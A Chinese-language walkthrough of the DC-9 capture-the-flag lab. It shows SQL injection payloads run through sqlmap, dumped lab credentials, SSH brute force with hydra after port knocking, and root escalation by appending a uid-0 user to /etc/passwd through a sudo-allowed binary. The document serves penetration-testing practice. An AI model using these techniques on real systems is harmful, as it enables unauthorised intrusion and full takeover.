DC9靶场渗透_cpe-0dc9

1.发现主机/扫描

root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.100.128  netmask 255.255.255.0  broadcast 192.168.100.255
        inet6 fe80::20c:29ff:fe72:6e3e  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:72:6e:3e  txqueuelen 1000  (Ethernet)
        RX packets 12  bytes 1448 (1.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 34  bytes 3043 (2.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
1
2
3
4
5
6
7
8
9

root@kali:~# nmap -sn 192.168.100.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-02 06:26 EST
Nmap scan report for 192.168.100.1
Host is up (0.00022s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.100.2
Host is up (0.000099s latency).
MAC Address: 00:50:56:E7:EA:F4 (VMware)
Nmap scan report for 192.168.100.129
Host is up (0.00023s latency).
MAC Address: 00:0C:29:B9:5C:FF (VMware)
Nmap scan report for 192.168.100.254
Host is up (0.00017s latency).
MAC Address: 00:50:56:EF:B7:A9 (VMware)
Nmap scan report for 192.168.100.128
Host is up.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

root@kali:~# nmap -T5 -A 192.168.100.129
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-02 06:27 EST
Nmap scan report for 192.168.100.129
Host is up (0.00034s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:B9:5C:FF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

2.网页漏洞查找

看sql漏洞

保存request成TXT放sqlmap跑

root@kali:~/dc9# sqlmap -r 123.txt -p search -dbs
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=mary' AND 2004=2004 AND 'UIdr'='UIdr
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=mary' AND (SELECT 8864 FROM (SELECT(SLEEP(5)))tOja) AND 'iLIo'='iLIo

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=mary' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a716a71,0x766f684450756164545359756c78644a69577a76526a41707172474d76487a744f5a6a4b6d4b6d6c,0x716b6a7871)-- 
1
2
3
4
5
6
7
1
2
3
4
5
6
7

available databases [3]:
[] information_schema
[] Staff
[*] users

root@kali:~/dc9# sqlmap -r 123.txt -p search -D users -T UserDetails -C firstname,lastname,username,password --dump

+-----------+------------+-----------+---------------+
| firstname | lastname   | username  | password      |
+-----------+------------+-----------+---------------+
| Mary      | Moe        | marym     | 3kfs86sfd     |
| Julie     | Dooley     | julied    | 468sfdfsd2    |
| Fred      | Flintstone | fredf     | 4sfd87sfd1    |
| Barney    | Rubble     | barneyr   | RocksOff      |
| Tom       | Cat        | tomc      | TC&TheBoyz    |
| Jerry     | Mouse      | jerrym    | B8m#48sd      |
| Wilma     | Flintstone | wilmaf    | Pebbles       |
| Betty     | Rubble     | bettyr    | BamBam01      |
| Chandler  | Bing       | chandlerb | UrAG0D!       |
| Joey      | Tribbiani  | joeyt     | Passw0rd      |
| Rachel    | Green      | rachelg   | yN72#dsd      |
| Ross      | Geller     | rossg     | ILoveRachel   |
| Monica    | Geller     | monicag   | 3248dsds7s    |
| Phoebe    | Buffay     | phoebeb   | smellycats    |
| Scooter   | McScoots   | scoots    | YR3BVxxxw87   |
| Donald    | Trump      | janitor   | Ilovepeepee   |
| Scott     | Morrison   | janitor2  | Hawaii-Five-0 |
+-----------+------------+-----------+---------------+

root@kali:~/dc9# sqlmap -r 123.txt -p search -D Staff  -T Users -C Password,Username -dump
Database: Staff                                                                             
Table: Users
[1 entry]
+--------------------------------------------------+----------+
| Password                                         | Username |
+--------------------------------------------------+----------+
| 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) | admin    |
+--------------------------------------------------+----------+


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

admin/transorbital1 登录

页脚有File does not exist ，可能有文件包含

fuzz一下用burp跑字典

22端口filtered 查看knockd.conf

 

[openSSH]
	sequence    = 7469,8475,9842
	seq_timeout = 25
	command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
	tcpflags    = syn
[closeSSH]
	sequence    = 9842,8475,7469
	seq_timeout = 25
	command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
	tcpflags    = syn
1
2
3
4
5
6
7
8
9
10

用nc敲击端口7469,8475,9842

用hydra爆破之前数据库的姓名密码登录尝试

root@kali:~/dc9# hydra -L username -P password ssh://192.168.100.129
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-02 08:57:25
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://192.168.100.129:22/
[22][ssh] host: 192.168.100.129   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.100.129   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.100.129   login: janitor   password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
1
2
3
4
5
6
7
8
9
10

登录3个账号，只有一个janitor目录里有隐藏文件passwords-found-on-post-it-notes.txt

把文件中密码加入原来字典重新hydra爆破一次，出现新的账号fredf

 

3.登录ssh提权

sudo -l 查看root权限，可以root运行 /opt/devstuff/dist/test/test

fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
1
2
3

User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test

进入该目录，发现test是个乱码文件，再去其父文件夹找到test.py文件

sys.argv为python外部参数sys.argv[0]为文件本身sys.argv[1]是第一个参数，以此类推。

该脚本可以把第一个参数当做文件名，读出文件内容，再写以‘a’的方式写入第二个参数所代表的文件中，不过非root用户没有执行权限，如果test与该脚本同样的作用，则可以用test把一个新用户加入passwd文件给予root权限。

检验test的功能，确实和test.py功能相同

OpenSSL命令生成密码123456的hash,按照passwd文件格式写入文件3，在执行test写入passwd

fredf@dc-9:/opt/devstuff/dist/test$ openssl passwd -1 123456
$1$nwJZbkAZ$w.INTxTEGFNLZCNq3rcrV1
1
2

fredf@dc9:/opt/devstuff/dist/test$ echo'ly3:$1$nwJZbkAZ$w.INTxTEGFNLZCNq3rcrV1:0:0:uuuu:/root:/bin/bash' > /tmp/3

fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/3 /etc/passwd

fredf@dc-9:/opt/devstuff/dist/test$ su ly3
Password:
root@dc-9:/opt/devstuff/dist/test# id
uid=0(root) gid=0(root) groups=0(root)

取得root权限